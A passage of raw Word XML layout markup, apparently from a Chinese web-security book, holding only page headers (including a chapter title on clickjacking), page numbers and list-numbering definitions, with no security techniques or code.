                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>谁来为漏洞买单？</w:t>
                </w:r>
              </w:p>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap type="none"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:407.079987pt;margin-top:45.992218pt;width:13.6pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71680" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:before="11"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>23</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>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71656" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:15.88pt;margin-top:45.512218pt;width:107.55pt;height:13pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71632" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:tabs>
                    <w:tab w:pos="538" w:val="left" w:leader="none"/>
                  </w:tabs>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>24</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:spacing w:val="-10"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>白帽子讲 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:spacing w:val="-2"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t> </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>安全</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71608" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:13.48pt;margin-top:45.512218pt;width:109.95pt;height:13pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71584" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:tabs>
                    <w:tab w:pos="586" w:val="left" w:leader="none"/>
                  </w:tabs>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>126</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:spacing w:val="-10"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>白帽子讲 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:spacing w:val="-2"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t> </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>安全</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71560" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:248.360001pt;margin-top:45.512218pt;width:146.5pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71536" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>第 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>5 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>章 点击劫持（</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>ClickJacking</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>）</w:t>
                </w:r>
              </w:p>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap type="none"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:404.679993pt;margin-top:45.992218pt;width:18.4pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71512" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:before="11"/>
                  <w:ind w:left="40" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:instrText> PAGE </w:instrText>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:t>127</w:t>
                </w:r>
                <w:r>
                  <w:rPr/>
                  <w:fldChar w:fldCharType="end"/>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71488" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:14.48pt;margin-top:45.512218pt;width:108.95pt;height:13pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71464" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:tabs>
                    <w:tab w:pos="566" w:val="left" w:leader="none"/>
                  </w:tabs>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>130</w:t>
                  <w:tab/>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:spacing w:val="-10"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>白帽子讲 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>Web</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:spacing w:val="-2"/>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t> </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:position w:val="1"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>安全</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71440" from="12.72pt,58.919971pt" to="423.84pt,58.919971pt" stroked="true" strokeweight=".48pt" strokecolor="#000000">
          <v:stroke dashstyle="solid"/>
          <w10:wrap type="none"/>
        </v:line>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:248.360001pt;margin-top:45.512218pt;width:146.5pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71416" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:line="242" w:lineRule="exact" w:before="0"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>第 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>5 </w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>章 点击劫持（</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>ClickJacking</w:t>
                </w:r>
                <w:r>
                  <w:rPr>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>）</w:t>
                </w:r>
              </w:p>
            </w:txbxContent>
          </v:textbox>
          <w10:wrap type="none"/>
        </v:shape>
      </w:pict>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:pict>
        <v:shape style="position:absolute;margin-left:405.679993pt;margin-top:45.992218pt;width:16.4pt;height:12.5pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-71392" type="#_x0000_t202" filled="false" stroked="false">
          <v:textbox inset="0,0,0,0">
            <w:txbxContent>
              <w:p>
                <w:pPr>
                  <w:spacing w:before="11"/>
                  <w:ind w:left="20" w:right="0" w:firstLine="0"/>
                  <w:jc w:val="left"/>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:rFonts w:ascii="Times New Roman"/>
                    <w:sz w:val="19"/>
                  </w:rPr>
                  <w:t>131</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8">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="911" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        <w:color w:val="818181"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1687" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2454" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3221" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3988" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4755" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5522" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6289" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7056" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="25">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="911" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings" w:eastAsia="Wingdings" w:cs="Wingdings"/>
        <w:color w:val="818181"/>
        <w:w w:val="99"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1687" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2454" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3221" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3988" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4755" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5522" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6289" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7056" w:hanging="312"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="35">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="*"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="28" w:hanging="140"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:w w:val="100"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="840" w:hanging="140"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1660" w:hanging="140"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2480" w:hanging="140"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3300" w:hanging="140"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4121" w:hanging="140"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4941" w:hanging="140"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5761" w:hanging="140"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6581" w:hanging="140"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="356" w:hanging="154"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        <w:w w:val="100"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1183" w:hanging="154"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2006" w:hanging="154"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2829" w:hanging="154"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3652" w:hanging="154"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4475" w:hanging="154"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5298" w:hanging="154"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6121" w:hanging="154"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6944" w:hanging="154"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="*"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="220" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
        <w:w w:val="100"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1020" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1820" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2620" w:hanging="192"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="0"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3420" w:hanging="192"/>
